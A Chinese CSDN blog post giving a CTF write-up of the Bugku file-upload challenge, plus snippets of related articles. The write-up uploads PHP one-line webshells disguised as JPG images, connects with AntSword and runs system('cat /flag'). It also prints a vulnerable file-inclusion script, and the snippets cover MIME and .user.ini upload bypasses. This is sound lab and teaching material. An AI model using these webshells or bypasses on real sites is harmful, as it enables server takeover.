CTF—文件上传练习

最新推荐文章于 2024-05-23 22:03:05 发布
最新推荐文章于 2024-05-23 22:03:05 发布
阅读量2.3k 收藏 8
点赞数 1
分类专栏: Web Web安全-CTFHub 文章标签: 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/119389684
版权

Bugku_文件上传2

今天做题的时候发现了这道题尝试了好久才搞出来,记录一下!

方法一

一个欢迎界面

在这里插入图片描述
查看源码:在注释中看到了upload.php
在这里插入图片描述
访问upload.php:
在这里插入图片描述
只能上传jpg gif png格式的文件,且大小不能超过100kib

我们写一句话木马,改后缀为jpg格式:
在这里插入图片描述
上传成功了!
访问一下路径:发现php被解析掉了
在这里插入图片描述

换一个一句话木马<script language="php">eval($_REQUEST[ABC])</script>
修改后缀为jpg格式,继续上传:上传成功,但是访问路径页面显示为空
在这里插入图片描述
尝试用蚁剑连接:
在这里插入图片描述
竟然连接成功了!!1
在根目录下可以找到flag!!

在后端可以看到源码:

<!-- upload.php -->
<?php
    if(!isset($_GET['file']))
    {
        header('Location: ./index.php?file=hello.php');
        exit();
    }
    @$file = $_GET["file"];
    if(isset($file))
    {
        if (preg_match('/php:\/\/|http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
            echo "<h1>NAIVE!!!</h1>";
        }
        else
        {
            include($file);
        }
    }
?>

方法二

依旧上传一句话木马,是通过命令执行的方式将文件显示出来:

<script language=php>system("ls /")</script>

修改文件后缀为jpg,上传成功!
访问路径发现文件flag
在这里插入图片描述
然后再上传图片马:

<script language=php>system("cat /flag")</script>

修改后缀上传!
访问路径得到flag!!
在这里插入图片描述

Stray.io
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"upload-labs-master" 从这个文件名来看,这可能是一个包含多个实验或挑战的目录,"labs"暗示了实验环境或者练习案例,而"master"可能表示这是一个主目录,包含了所有关于文件上传相关的学习资源。 综合以上信息,...
CTFHub | Web——文件上传(前端验证)
2301_76435948的博客
10-07 708
在通过验证之后还未发出时,拦截HTTP请求,然后修改数据,使得JavaScript的验证不起作用。虽然将后缀名改回.php,里面的代仍然存在,但是我想要的是图片形式的木马啊(Q_Q)cmd 将该木马文件复制到任意图片中,利用文件包含漏洞解析图片木马。cmd 将该木马文件复制到任意图片中,利用文件包含漏洞解析图片木马。JavaScript属于前端验证,在浏览器未提交数据时进行验证。修改图片内容 在图片txt格式末尾加一句话木马。修改图片内容 在图片txt格式末尾加一句话木马。利用工具edjpgcom。
ctf-web入门-文件上传
whisper921的博客
05-28 4024
Web 151 考点:后端无验证,前端校验 查看源可以发现只能上传png图片 修改为php 写一个php文件上传一句话木马 可以发现已经成功上传 查看上级目录发现可疑文件 查看flag.php文件内容得出flag 得到flag Web 152 考点:绕过前端校验 解题思路: 经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。那就抓包一下。 将Content-Type内容修改成image/png,重发,发现成...
CTFshow之文件上传web入门151关-161关解密。包教包会!!!!
最新发布
2301_77578012的博客
05-23 1124
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
CTFHubWeb—文件上传
qq_45927819的博客
07-27 1429
文章目录无验证前端验证.htaccess方法一方法二MIME绕过文件头检查00截断 无验证 没什么限制,直接一句话木马 <?php @eval($_POST['upload']);?> 提交成功! 并且提示了文件的相对路径,那我们可以直接使用蚁剑或者菜刀连接 打开便可以得到flag! 前端验证 既然是前端js验证,那我们尝试用burpsuite抓包 上题写的一句话木马还可以接着用,但是我们要将他的后缀改成png或者jpg,抓包: forward放包,上传成功!提示了文件路径,蚁剑连接
CTF文件上传
qq_45086218的博客
03-22 3721
文章目录一句话木马文件类型验证修改文件名修改文件类型user.iniauto_append_file和auto_prepend_file 本文以ctf.show网站题目为例,总结ctf中的文件上传姿势 一句话木马 <?php @eval($_POST['shell']);?> 文件类型验证 文件上传题多数只能上传图片,即jpg/png格式文件 修改文件名 Content-Disposition: form-data; name="file"; filename="shell.png" 将s
ctf文件上传
Zheng_Jay的博客
11-15 3951
客户端校验 最简单的文件校验是本地js校验,一般都是要求只能上传jpg,png,gif图片格式: 应对措施:在本地禁用js。 服务端校验 服务端校验比较棘手一点。 MIME类型校验 虽然我们在客户端同过禁用js上传了文件,但服务端还会再对文件类型进行校验,并且校验的是MIME。 我们在开发者工具中,虽然看到文件发送成功: 但如果服务端对我们请求的数据中的MIME类型进行校验,发现并非image类型,仍会丢弃。 所以,我们要修改请求包中的MIME类型(使用burp suit),常见的MIME类型:
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
从题目名称推测,这可能是关于文件类型判断的错误,参赛者需要利用这一点来访问或上传非预期格式的文件,可能涉及到目录遍历或文件上传漏洞。 **入门第二部分** 1. **bugku-ctf 第一题:细心** 这个题目强调细节...
文件上传漏洞练习靶场环境.zip
08-31
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上传方式。 1.每一关没有固定的通关方法,大家...
Converter编转换CTF比赛用
07-12
在网络安全和信息安全竞赛中,尤其是Capture The Flag (CTF) 比赛,编和解是常见的挑战。"Converter编转换CTF比赛用"是...同时,熟悉各种编和解方法,结合实际案例进行练习,将有助于提升在CTF比赛中的表现。
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
4. **文件包含漏洞**:了解如何通过文件包含漏洞执行任意代,以及防御措施,如限制可包含文件类型、使用绝对路径和禁止远程文件包含。 5. **权限与配置管理**:学习如何利用不正确的权限设置或配置,如目录遍历和...
CTF-WEB入门DOC-2019版1
08-03
2. 文件上传:通过uploadlabs-wp了解文件上传漏洞。 3. XSS:学习xss-labs、xsslabs-wp、prompt 1 to win等,掌握XSS攻击和防御。 4. SSRF:参考ssrf学习记录进行深入理解。 5. PHP漏洞:学习PHP基础和相关漏洞,如...
金盾信安比赛记录.pdf
12-12
这些挑战展示了网络安全竞赛中常见的技能,包括Web应用安全测试、文件上传漏洞利用、内存分析、密学、编技巧以及图像处理。对于想要在网络安全领域提升技能的人来说,这些都是非常重要的实践练习
network-security:学习web安全练习的靶场,以及总结的思维导图和笔记
03-13
网络安全启用学习网络安全练习过的靶场,笔记,还有一些好文章之后会有一些实战案例靶场:SSRF: 1.ssrf-lab: : 。 ssrf-lab靶场教程: ://www.codenong.com/cs105709428/。 2.ctfhub.com中ssrf模块。XSS: 1.xss...
DVWA网络安全
05-18
用户通常需要将这些文件上传到一个支持PHP和MySQL的服务器环境,例如XAMPP或WAMP。 **二、安装与配置** 1. **解压文件**:首先,你需要将DVWA-master文件夹解压缩到你的Web服务器根目录下。 2. **数据库设置**:...
RE101in20min:在Pancakes Con上展示的20分钟内用于逆向工程的幻灯片101
03-08
挑战,练习CTF问题等 Expoloit Education Protostar / Phoenix,星云,融合等。 Pwnable KR '是一个非商业性的战争游戏网站,它提供有关系统开发的各种pwn挑战” SmashTheStack IO 电线 倒
CTF练习题——Upload上传的一道解题思路
Jum的博客
08-11 3170
好久没有去联系联系了,今天做了一道关于Upload的题,分享一下 目录 拿题目 找思路 得到结果 成功 拿题目 这道题目是百度CTF题目,题干如下: 找思路 题干中提示 tips:flag在flag.php中。看到题干后,可以上传任意文件,并且上传之后可以打开文件,想到上传一段php代来打开flag.php页面: <?php $fh=fopen('../flag.php','r'); echo fread($fh,filesize("../flag.php")); ...
bugku-web-文件上传
m0_57954651的博客
11-02 1872
不可以上传 php文件 说明一共存在三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type
网络安全实验室--上传关
Osumail的博客
05-07 1185
— title: 网络安全实验室–上传关 关注我的博客,访问更多内容! 基础关题目地址 网络安全实验室之上传关,题目略少,也很基础,如有错误,欢迎在评论中指出。 1.请上传一张jpg格式的图片 只能上传jpg格式的图片哦~! (过关地址) 解:上传一张jpg图片,被嘲讽了没有得到flag,想到实际应上传php文件,应该想到上传jpg文件然后修改请求报文里的相关内容,先bp抓包,发送到repeate...
ctf 文件上传zip
09-10
CTF(Capture The Flag)是一种网络安全竞赛,其中包含多个与网络安全相关的题目,玩家需要通过解决这些题目来获取各种FLAG。在CTF比赛中,文件上传和解压缩是常见的题型之一。 文件上传和解压缩也是Web开发中常见的功能之一。在CTF比赛中,通常会出现一个具有文件上传功能的网站,目标是实现绕过网站的安全限制,上传一个恶意的zip文件。 要成功上传一个恶意的zip文件,需要对网站进行渗透测试,找到相应的漏洞。常见的漏洞包括文件类型验证不严格、上传路径没有限制等。渗透测试者可以通过修改file的Content-Type参数,将其伪装成zip文件,从而绕过文件类型验证。此外,还可以通过畸形的文件名、路径进行绕过。 成功上传恶意的zip文件后,需要进行解压缩,通常会将zip文件中的内容解压到服务器的指定路径。解压缩操作也可能存在漏洞,例如在解压缩时未对文件名进行过滤、解压缩路径的限制不严格等。渗透测试者可以通过构造恶意的zip文件,来绕过相关的限制,以实现对服务器的攻击。 为了防止这种情况发生,在进行文件上传时,应该进行严格的文件类型验证,确保只有允许的文件类型才能被上传。同时,应该对上传路径和解压缩路径进行限制,避免恶意文件对服务器造成损害。 CTF比赛中的文件上传和解压缩相关题目,旨在考察参赛者对文件上传和解压缩功能的理解,以及对常见漏洞的识别和利用能力。通过解决这些题目,参赛者可以提高自己的网络安全知识和技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值